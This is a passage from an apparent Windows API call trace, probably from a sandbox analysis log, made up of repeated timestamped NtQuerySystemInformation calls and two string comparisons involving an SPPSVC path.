(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd80, Length=0x28, ResultLength=0x0) [0272.175] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0272.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0272.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0272.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0272.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb60, Length=0x28, ResultLength=0x0) [0272.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb60, Length=0x28, ResultLength=0x0) [0272.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb60, Length=0x28, ResultLength=0x0) [0272.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x28, ResultLength=0x0) [0272.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0272.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x28, ResultLength=0x0) [0272.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x28, ResultLength=0x0) [0272.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x20, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb30, Length=0x20, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb30, Length=0x20, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb30, Length=0x20, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x20, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x20, ResultLength=0x0) [0272.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x20, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd80, Length=0x28, ResultLength=0x0) [0272.184] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb60, Length=0x28, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb60, Length=0x28, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb60, Length=0x28, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x28, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x28, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x28, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x20, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb30, Length=0x20, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb30, Length=0x20, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb30, Length=0x20, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x20, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x20, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x20, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0272.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0272.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0272.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x28, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3c0, Length=0x20, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x28, ResultLength=0x0) [0272.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3c0, Length=0x20, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.213] NtQuerySystemInformation 